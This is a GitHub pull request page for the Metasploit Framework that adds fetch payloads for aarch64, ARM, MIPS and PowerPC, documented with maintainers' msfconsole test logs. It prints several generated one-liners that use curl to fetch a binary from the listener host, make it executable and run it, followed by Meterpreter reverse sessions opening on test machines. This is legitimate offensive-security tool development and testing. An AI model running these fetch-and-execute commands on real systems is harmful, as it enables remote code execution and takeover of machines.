Skip to content

Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 #19850

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 9 commits into from
Feb 20, 2025
Merged

Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 #19850

merged 9 commits into from
Feb 20, 2025

Conversation

bwatters-r7
Copy link
Contributor

Adding several arch adapters to increase fetch payload coverage.
Please await testing.

@bwatters-r7
Copy link
Contributor Author

bwatters-r7 commented Jan 30, 2025
edited by dledda-r7
Loading

AARCH64 STAGELESS

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.149 - Meterpreter session 1 closed.  Reason: User exit
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > use payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > generate -f raw
[-] Payload generation failed: One or more options failed to validate: LHOST.
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > generate -f raw
curl -sko /tmp/QmFuhTnL https://10.5.135.201:8080/d7GiQGdEoodZ84-t6UNmYg;chmod +x /tmp/QmFuhTnL;/tmp/QmFuhTnL&
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:60240) at 2025-01-30 15:24:27 -0600

msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.149 - Meterpreter session 2 closed.  Reason: Died
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > use payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/syKtpABbG tftp://10.5.135.201:8080/rO0FgHU1uz_fQ-O3YyXWaA;chmod +x /tmp/syKtpABbG;/tmp/syKtpABbG&
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.132.149:39082) at 2025-01-30 15:25:19 -0600

msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux

EDIT (@dledda-r7)

AARCH64 STAGED

Using qemu-aarch64-static

msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > generate -f
curl -so /tmp/iNqFqLGm http://172.26.133.223:8080/otevclxI8w0bUs3qv_y3Dw;chmod +x /tmp/iNqFqLGm;/tmp/iNqFqLGm&
msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > 
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 172.26.133.223
[*] Meterpreter session 4 opened (172.26.133.223:4444 -> 172.26.133.223:34684) at 2025-02-04 13:31:46 -0500

msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : 172.26.133.223
OS           : Debian  (Linux 6.11.2-amd64)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter >

@bwatters-r7
Copy link
Contributor Author

ARMEL

msf6 payload(cmd/linux/tftp/armle/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (10.5.135.201:4441 -> 10.5.134.124:51028) at 2025-01-30 16:42:37 -0600

msf6 payload(cmd/linux/tftp/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : debian-armel.""
OS           : Debian 6.0.10 (Linux 2.6.32-5-versatile)
Architecture : armv5tejl
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > exit
[*] Shutting down session: 1

This system did not have cURL or TFTP

@bwatters-r7
Copy link
Contributor Author

MIPSLE

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8080
FETCH_SRVPORT => 8080
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set lport 4441
lport => 4441
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/NvpFcezafvU http://10.5.135.201:8080/rrP6zvtTemFbQhNqsbSjgA;chmod +x /tmp/NvpFcezafvU;/tmp/NvpFcezafvU&
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 16

[*] Started reverse TCP handler on 10.5.135.201:4441
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) >
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8081
FETCH_SRVPORT => 8081
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set lport 4442
lport => 4442
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -sko /tmp/pKTiqTdcSXX https://10.5.135.201:8081/YPmJ9swoEPYA_F8mtNz5pg;chmod +x /tmp/pKTiqTdcSXX;/tmp/pKTiqTdcSXX&
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 17
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) >
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8082
FETCH_SRVPORT => 8082
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set lport 4443
lport => 4443
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/LJUUbmrlBJ tftp://10.5.135.201:8082/NISRlXNmxW2uTHn_9QWATw;chmod +x /tmp/LJUUbmrlBJ;/tmp/LJUUbmrlBJ&
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 18

[*] Started reverse TCP handler on 10.5.135.201:4443
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > [*] Meterpreter session 4 opened (10.5.135.201:4441 -> 10.5.132.135:49706) at 2025-01-30 17:00:10 -0600
[*] Started reverse TCP handler on 10.5.135.201:4442
[*] Meterpreter session 5 opened (10.5.135.201:4442 -> 10.5.132.135:47960) at 2025-01-30 17:00:18 -0600
[*] Meterpreter session 6 opened (10.5.135.201:4443 -> 10.5.132.135:35328) at 2025-01-30 17:00:23 -0600

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                      Information         Connection
  --  ----  ----                      -----------         ----------
  4         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4441 -> 10.5.132.135:49706 (10.5.132.135)
  5         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4442 -> 10.5.132.135:47960 (10.5.132.135)
  6         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4443 -> 10.5.132.135:35328 (10.5.132.135)

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 4 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
[*] Running 'sysinfo' on meterpreter session 5 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
[*] Running 'sysinfo' on meterpreter session 6 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux

@dledda-r7 dledda-r7 self-assigned this Jan 31, 2025
@jheysel-r7 jheysel-r7 mentioned this pull request Jan 31, 2025
Merged
8 tasks
@jheysel-r7
Copy link
Contributor

Hey @dledda-r7 as per our slack discussion I'm just linking this testing done by @h00die-gr3y who found an issue when testing the staged versions of some of the newly supported architectures for fetch payloads.

#19841 (comment)

@bwatters-r7
Copy link
Contributor Author

MIPSBE

msf6 payload(cmd/linux/http/mipsbe/meterpreter_reverse_tcp) > [*] Client 10.5.134.124 requested /KGrf3Ppw2f7d4FyPVpCzyQ
[*] Sending payload to 10.5.134.124 (Wget/1.12 (linux-gnu))
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.124:40302) at 2025-02-05 15:52:06 -0600

msf6 payload(cmd/linux/http/mipsbe/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : debian-mips.""
OS           : Debian 6.0.8 (Linux 2.6.32-5-4kc-malta)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: root
meterpreter >

@bwatters-r7
Copy link
Contributor Author

Closes #19848

cdelafuente-r7
cdelafuente-r7 reviewed Feb 6, 2025
View reviewed changes
@bwatters-r7 bwatters-r7 marked this pull request as ready for review February 11, 2025 13:49
@dledda-r7
Copy link
Contributor

Ok so, so far I am able to get a fetch payload for:

  • armle (staged and stageless meterpreter)
  • armbe (stageless meterpreter)
  • aarch64 (staged and stageless meterpreter)
  • mipsle (staged and stageless meterpreter)
  • mipsbe (stageless meterpreter)
  • ppc (stageless meterpreter)

I am having issue with the PPC64... so far looks like we have meterpreter only for PPC64LE, but for PPC64(BE) we have couple of payloads that should(?) be supported:

msf6 payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > search cmd/linux/ppc64
[-] No results from search
msf6 payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > search linux/ppc64

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  payload/linux/ppc64/shell_bind_tcp               .                normal  No     Linux Command Shell, Bind TCP Inline
   1  payload/linux/ppc64/shell_find_port              .                normal  No     Linux Command Shell, Find Port Inline
   2  payload/linux/ppc64/shell_reverse_tcp            .                normal  No     Linux Command Shell, Reverse TCP Inline
   3  payload/linux/ppc64le/meterpreter_reverse_http   .                normal  No     Linux Meterpreter, Reverse HTTP Inline
   4  payload/linux/ppc64le/meterpreter_reverse_https  .                normal  No     Linux Meterpreter, Reverse HTTPS Inline
   5  payload/linux/ppc64le/meterpreter_reverse_tcp    .                normal  No     Linux Meterpreter, Reverse TCP Inline


Interact with a module by name or index. For example info 5, use 5 or use payload/linux/ppc64le/meterpreter_reverse_tcp

@bwatters-r7 let me know what is the best move for this, other than this little thing everything looks good to me.

@bwatters-r7
Copy link
Contributor Author

@dledda-r7 I did not make those because I did not think we had any demand or targets for them. I can add them if we want, but since we have at least 1 PR blocked waiting for this PR, it might be better to mark it as an issue and add them later.

@bwatters-r7
Remove CBEA64 arch values so PPC64 arches have only 1 arch value
87ec9ee 
Multiple arches broke payload adaptyers and we do not use them, anyway
@bwatters-r7
Add PPC64LE Fetch payloads
8cbcdd1
@bwatters-r7
Copy link
Contributor Author

Just pushed 2 changes:

  1. Fixed the PPC64(BE) fetch payloads. The issue was that for some reason, PPC64 payloads have 2 arch types: ARCH_PPC64 and ARCH_CBEA64. Having an array of Arches in the payload caused the adapter's logic to think that the payload did not match the Adapted_Arch. I looked at fixing the Adapter logic, but we don't actually use the ARCH_CBEA64 anywhere else except the payload_uuid calculator, so I just removed it. A Google search has us as a good bit of the first page, so I'm not sure why we were using it?
msf6 payload(cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp) > use payload/cmd/linux/http/ppc64/shell_reverse_tcp
msf6 payload(cmd/linux/http/ppc64/shell_reverse_tcp) > show options

Module options (payload/cmd/linux/http/ppc64/shell_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      eYvMbvfejPN      no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/ppc64/shell_reverse_tcp) > use payload/cmd/linux/https/ppc64/shell_reverse_tcp
msf6 payload(cmd/linux/https/ppc64/shell_reverse_tcp) > show options

Module options (payload/cmd/linux/https/ppc64/shell_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_CHECK_CERT    false            yes       Check SSL certificate
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      FXRVKUpC         no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/https/ppc64/shell_reverse_tcp) > use payload/cmd/linux/tftp/ppc64/shell_reverse_tcp
msf6 payload(cmd/linux/tftp/ppc64/shell_reverse_tcp) > show options

Module options (payload/cmd/linux/tftp/ppc64/shell_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      MPZSMHwOM        no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVONCE       true             yes       Stop serving the payload after it is retrieved
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.
  1. Easier- added PPC64LE payloads.
msf6 payload(cmd/linux/http/ppc64/shell_find_port) > use payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/ppc64le/meterpreter_reverse_tcp) > show options

Module options (payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      rrJGqPJDlar      no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/http/ppc64le/meterpreter_reverse_tcp) > use payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp
msf6 payload(cmd/linux/https/ppc64le/meterpreter_reverse_tcp) > show options

Module options (payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_CHECK_CERT    false            yes       Check SSL certificate
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      iLEjqZIXIjqc     no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/https/ppc64le/meterpreter_reverse_tcp) > use payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp
msf6 payload(cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp) > show options

Module options (payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      avFRxRkilp       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVONCE       true             yes       Stop serving the payload after it is retrieved
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp) >

dledda-r7
dledda-r7 approved these changes Feb 20, 2025
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Changes looks good.
The only issue present is the fact we don't have a PPC64 ELF template. 🫠
But that's unrelated to this PR... also, @msutovsky-r7 added already a lot of PPC templates here #19799 so it will not be an issue to add another one.
Thanks Brendan!

msf6 payload(cmd/linux/http/ppc64/shell_reverse_tcp) > to_handler 
[-] Exploit failed: Failed to generate an executable payload due to an invalid platform or arch.

@dledda-r7 dledda-r7 merged commit 4374484 into rapid7:master Feb 20, 2025
62 checks passed
@dledda-r7 dledda-r7 added the rn-payload-enhancement release notes for enhanced payloads label Feb 20, 2025
@dledda-r7
Copy link
Contributor

dledda-r7 commented Feb 20, 2025
edited by adfoster-r7
Loading

Release Notes

Adds fetch-payload support for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 and ppc64le payloads.

@bwatters-r7 bwatters-r7 mentioned this pull request Feb 25, 2025
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
arm arm payload rn-payload-enhancement release notes for enhanced payloads
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@bwatters-r7 @jheysel-r7 @dledda-r7 @cdelafuente-r7